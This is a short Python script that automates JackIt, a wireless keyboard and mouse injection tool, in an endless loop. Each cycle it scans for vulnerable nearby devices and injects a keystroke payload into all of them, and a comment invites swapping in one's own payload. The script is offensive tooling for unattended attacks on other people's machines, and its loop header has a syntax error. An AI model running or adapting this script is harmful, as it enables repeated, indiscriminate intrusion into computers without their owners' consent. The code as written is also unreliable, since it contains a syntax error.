#!/usr/bin/python
#Insert your own payload path
import pexpect, time, sys

while True;
  time.sleep(10)
  print("Starting Jackit")
  id = pexpect.spawn('jackit --script jackit/examples/hello.script')
  print("Scanning")
  time.sleep(10)
  id.sendline('all')
  print("Payloads Injected")
